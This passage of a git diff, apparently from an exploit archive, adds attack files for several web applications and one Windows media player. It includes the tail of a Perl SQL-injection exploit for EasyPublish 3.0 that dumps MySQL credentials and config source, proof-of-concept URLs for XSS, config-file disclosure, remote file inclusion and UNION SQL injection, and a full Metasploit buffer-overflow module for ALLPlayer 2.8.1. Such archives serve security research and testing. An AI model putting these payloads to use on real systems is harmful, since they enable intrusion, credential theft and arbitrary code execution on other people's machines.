"/staticpages/easypublish/index.php?PageSection=0&table=edp_News&page=individual&fage=search&read=1+union+all+select+1,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),3,4,1,5+FROM+edp_puusers/*"; +$requestpage = $url.$vul; + +my $req = HTTP::Request->new("POST",$requestpage); +$ua = LWP::UserAgent->new; +$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); +#$req->referer($url); +$req->referer("IRCRASH.COM"); +$req->content_type('application/x-www-form-urlencoded'); +$req->header("content-length" => $contlen); +$req->content($poststring); + +$response = $ua->request($req); +$content = $response->content; +$header = $response->headers_as_string(); + + +@name = split(/Login:/,$content); +$name = @name[1]; +@name = split(//,$name); +$name = @name[0]; + + +if(!$name && !$password) +{ +print "\n\n"; +print "!Exploit failed ! :(\n\n"; +exit; +} + +open (FILE, ">".source.".txt"); +print FILE $name; +close (FILE); +print " File Save In source.txt\n"; +print ""; + +} + +#XPL2 END +#Starting; +print " +**************************************************** +* EasyPublish 3.0tr Exploit * +**************************************************** +*Discovered by : Khashayar Fereidani * +*Exploited by : Khashayar Fereidani * +*My Official Website : http://fereidani.ir * +**************************************************** +* Mod Options : * +* Mod 1 : Find mysql username and root password * +* Mod 2 : Save PHP config source in your system * +****************************************************"; +print "\n \n Enter Mod : "; +$mod=; +if ($mod=="1" or $mod=="2") { print "\n Exploiting .............. \n"; } else { print "\n Unknown Mod ! \n Exploit Failed !"; }; +if ($mod=="1") { xpl1(); }; +if ($mod=="2") { xpl2(); }; diff --git a/platforms/php/webapps/32090.txt b/platforms/php/webapps/32090.txt new file mode 100755 index 000000000..94ac5a9d7 --- /dev/null +++ b/platforms/php/webapps/32090.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/30309/info + +Maran PHP Blog is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/comments.php?id=%3E%3C%3E%27%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/32091.txt b/platforms/php/webapps/32091.txt new file mode 100755 index 000000000..b968b4f96 --- /dev/null +++ b/platforms/php/webapps/32091.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/30310/info + +MyBlog is prone to multiple information-disclosure vulnerabilities because the application fails to properly restrict access to sensitive files. + +An unprivileged attacker may exploit these issues to obtain sensitive information. + +MyBlog 0.9.8 is vulnerable; other versions may also be affected. + +http://www.example.com/config/mysqlconnection.inc +http://www.example.com/config/mysqlconnection%20-%20Copy.inc +http://www.example.com/admin/setup.php +http://www.example.com/config/settings.inc \ No newline at end of file diff --git a/platforms/php/webapps/32092.txt b/platforms/php/webapps/32092.txt new file mode 100755 index 000000000..05f154b1a --- /dev/null +++ b/platforms/php/webapps/32092.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30312/info + +Flip is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker can exploit this issue to execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible. + +Flip 3.0 is vulnerable; other versions may also be affected. + +http://www.example.com/config.php?incpath=[SHELL] \ No newline at end of file diff --git a/platforms/php/webapps/32093.txt b/platforms/php/webapps/32093.txt new file mode 100755 index 000000000..04acda8a9 --- /dev/null +++ b/platforms/php/webapps/32093.txt @@ -0,0 +1,8 @@ +source: http://www.securityfocus.com/bid/30318/info + +phpKF is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + + +http://www.example.com/lab/phpkf/yonetim/forum_duzen.php?kip=forum_duzenle&fno='+union+select+kullanici_adi,concat(database(),0x3a,version()),sifre+from+phpkf_kullanicilar/* \ No newline at end of file diff --git a/platforms/windows/local/32074.rb b/platforms/windows/local/32074.rb new file mode 100755 index 000000000..c5f690e2d --- /dev/null +++ b/platforms/windows/local/32074.rb @@ -0,0 +1,107 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::FILEFORMAT + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ALLPlayer M3U Buffer Overflow', + 'Description' => %q{ + This module exploits a stack-based buffer overflow vulnerability in + ALLPlayer 2.8.1, caused by a long string in a playlist entry. + By persuading the victim to open a specially-crafted .M3U file, a + remote attacker could execute arbitrary code on the system or cause + the application to crash. This module has been tested successfully on + Windows 7 SP1. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'metacom', # Vulnerability discovery + 'Mike Czumak', # Original exploit + 'Gabor Seljan' # Metasploit module + ], + 'References' => + [ + [ 'BID', '62926' ], + [ 'BID', '63896' ], + [ 'EDB', '28855' ], + [ 'EDB', '29549' ], + [ 'EDB', '29798' ], + [ 'EDB', '32041' ], + [ 'OSVDB', '98283' ], + [ 'URL', 'http://www.allplayer.org/' ] + ], + 'DefaultOptions' => + { + 'ExitFunction' => 'process' + }, + 'Platform' => 'win', + 'Payload' => + { + 'DisableNops' => true, + 'BadChars' => "\x00\x0a\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f", + 'Space' => 3060, + 'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed, + 'EncoderOptions' => + { + 'BufferRegister' => 'EAX' + } + }, + 'Targets' => + [ + [ ' ALLPlayer 2.8.1 / Windows 7 SP1', + { + 'Offset' => 301, + 'Ret' => "\x50\x45", # POP POP RET from ALLPlayer.exe + 'Nop' => "\x6e" # ADD BYTE PTR DS:[ESI],CH + } + ] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Oct 09 2013', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']) + ], + self.class) + + end + + + def exploit + nop = target['Nop'] + + sploit = rand_text_alpha_upper(target['Offset']) + sploit << "\x61\x50" # POPAD + sploit << target.ret + sploit << "\x53" # PUSH EBX + sploit << nop + sploit << "\x58" # POP EAX + sploit << nop + sploit << "\x05\x14\x11" # ADD EAX,0x11001400 + sploit << nop + sploit << "\x2d\x13\x11" # SUB EAX,0x11001300 + sploit << nop + sploit << "\x50" # PUSH EAX + sploit << nop + sploit << "\xc3" # RET + sploit << nop * 109 + sploit << payload.encoded + sploit << rand_text_alpha_upper(10000) # Generate exception + + # Create the file + print_status("Creating '#{datastore['FILENAME']}' file ...") + file_create("http://" + sploit) + + end +end \ No newline at end of file